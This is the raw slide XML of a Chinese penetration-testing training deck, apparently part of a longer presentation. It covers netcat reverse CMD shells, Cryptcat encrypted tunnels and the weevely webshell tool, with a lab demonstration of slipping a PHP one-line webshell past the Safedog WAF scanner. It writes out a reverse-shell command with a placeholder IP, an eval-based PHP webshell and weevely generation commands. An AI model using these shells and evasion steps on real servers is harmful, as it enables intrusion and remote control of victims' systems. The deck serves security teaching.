          <p:cNvPr id="199" name="Shape 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590548" y="8173352"/>
            <a:ext cx="11204727" cy="101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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>想要获得完整的信息，可以多尝试不同的工具，整合结果。很多工具无法做反向查询的原因，在于域名所有者没有添加反向解析记录。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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6" name="Shape 786"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491100" y="567167"/>
            <a:ext cx="3616772"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>NC反弹CMDShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="787" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010689" y="2352628"/>
            <a:ext cx="10983422" cy="3141600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Shape 788"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021627" y="1590089"/>
            <a:ext cx="7048764"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500"/>
            </a:pPr>
            <a:r>
              <a:t>【Shell上执行】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>nc.exe -t -e cmd.exe X.X.X.X 23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Shape 789"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945427" y="6568488"/>
            <a:ext cx="7963218"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【本地】成功得到CMDShell，即在本地可直接执行CMD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="790" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172581" y="7311750"/>
            <a:ext cx="10485218" cy="1699129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="Shape 792"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327650" y="504362"/>
            <a:ext cx="1711400" cy="571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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cryptcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="Shape 793"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817326" y="1409699"/>
            <a:ext cx="11674948" cy="1473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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Netcat隧道加密之Cryptcat，正所谓菜刀砍狗头，渗透信猫流，狗和猫常常是相互的，比如安全狗。cryptcat与netcat最主要区别就是，通过隧道在传输数据时，它传输的数据经过了加密。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Shape 794"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817326" y="3216736"/>
            <a:ext cx="11674948" cy="1473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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cryptcat是经典网络工具netcat的加密版，使用twofish算法加密，其密钥协商过程基于发送、接收双发共享的一个password。Cryptcat用法基本和NC相近，不过多介绍了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="795" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885612" y="4692312"/>
            <a:ext cx="8979576" cy="4489788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 797"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327650" y="504362"/>
            <a:ext cx="1624701" cy="571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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>weevely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Shape 798"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507962" y="1562099"/>
            <a:ext cx="11674948" cy="193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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>weevely是一款使用python编写的webshell工具（集webshell生成和连接于一身，仅用于安全学习教学之用，禁止非法用途），可以算作是linux下的一款菜刀替代工具（限于php）。使用weevely生成的shell免杀能力很强，并使用加密连接，往往能轻松突破防火墙拦截。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="799" name="Shape 799"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325414" y="7112000"/>
            <a:ext cx="19431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实例演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Shape 800"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3164931" y="8001000"/>
            <a:ext cx="6674938"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>一句话木马突破“安全狗”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Shape 801"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5625649" y="4286250"/>
            <a:ext cx="10287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概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802" name="Shape 802"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600496" y="5126036"/>
            <a:ext cx="9392937"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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4" name="Shape 804"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567845" y="1454100"/>
            <a:ext cx="5424170"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2500"/>
            </a:pPr>
            <a:r>
              <a:t>#输入</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>weevely generate</a:t>
            </a:r>
            <a:r>
              <a:t>可查看帮助</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Shape 805"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="806" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1938509" y="2023533"/>
            <a:ext cx="8086382" cy="3477860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Shape 807"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928202" y="6115000"/>
            <a:ext cx="8335596" cy="3289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2500"/>
            </a:pPr>
            <a:r>
              <a:t>#从提示中可以看到</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>连接一句话木马：    weevely &lt;URL&gt; &lt;password&gt; [cmd]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr b="1" sz="2400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>加载session文件      weevely session &lt;path&gt; [cmd]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>生成后门代理           weevely generate &lt;password&gt; &lt;path&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Shape 809"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Shape 810"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723899" y="1866900"/>
            <a:ext cx="138430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实验环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="Shape 811"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823594" y="2616200"/>
            <a:ext cx="5542281" cy="1778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2500"/>
            </a:pPr>
            <a:r>
              <a:t>OS：Win Sevr 2008  R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Server :Apache 2.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Firewall:安全狗(Apache版)V3.1正式版</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="Shape 812"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772794" y="4368800"/>
            <a:ext cx="2778761" cy="5588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defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OS：Kali Linux 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="813" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6731376" y="1872273"/>
            <a:ext cx="5747709" cy="3108824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="814" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394293" y="5860587"/>
            <a:ext cx="9254657" cy="2884119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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6" name="Shape 816"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580545" y="2025600"/>
            <a:ext cx="4190931" cy="231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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#将安全狗的网马库更新到最新后，再进行常规扫描，扫描结果为“未发现网页木马及其他危险文件”，即一切正常</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Shape 817"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263095" y="300467"/>
            <a:ext cx="4032077" cy="132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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示生成一句话木马突破“安全狗”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="818" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5098178" y="372533"/>
            <a:ext cx="7491440" cy="5270449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Shape 819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593245" y="5937200"/>
            <a:ext cx="11248357"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#手动在网站目录下添加变种的一句话木马，命名为test.php，结果显然会被杀</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="820" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261408" y="7295931"/>
            <a:ext cx="10481984" cy="2024365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Shape 821"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482245" y="6521400"/>
            <a:ext cx="6551491"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>test.php      &lt;?php @eval($_POST['c']);?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="Shape 823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618645" y="1327100"/>
            <a:ext cx="4421531"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#通过weevely生成一句话木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="Shape 824"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275795" y="363967"/>
            <a:ext cx="7597950" cy="711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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示生成一句话木马突破“安全狗”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="825" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218037" y="3321596"/>
            <a:ext cx="9943031" cy="4239599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Shape 826"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228245" y="1957082"/>
            <a:ext cx="6893368"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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>weevely generate test /root/Desktop/test.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Shape 827"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228245" y="2459063"/>
            <a:ext cx="6540993"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#test为密码，/root/Desktop/test.php输出路径</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828" name="Shape 828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228245" y="8008963"/>
            <a:ext cx="7507979"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#将生成的木马放到网站根目录，替换原来的test.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="Shape 830"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618645" y="1327100"/>
            <a:ext cx="9943031"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#将生成的木马放到网站根目录，替换原来的test.php，并重新扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Shape 831"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275795" y="363967"/>
            <a:ext cx="7597950" cy="711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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示生成一句话木马突破“安全狗”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="832" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251058" y="6506027"/>
            <a:ext cx="9740792" cy="2815923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Shape 833"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215545" y="5981700"/>
            <a:ext cx="7744542" cy="482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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
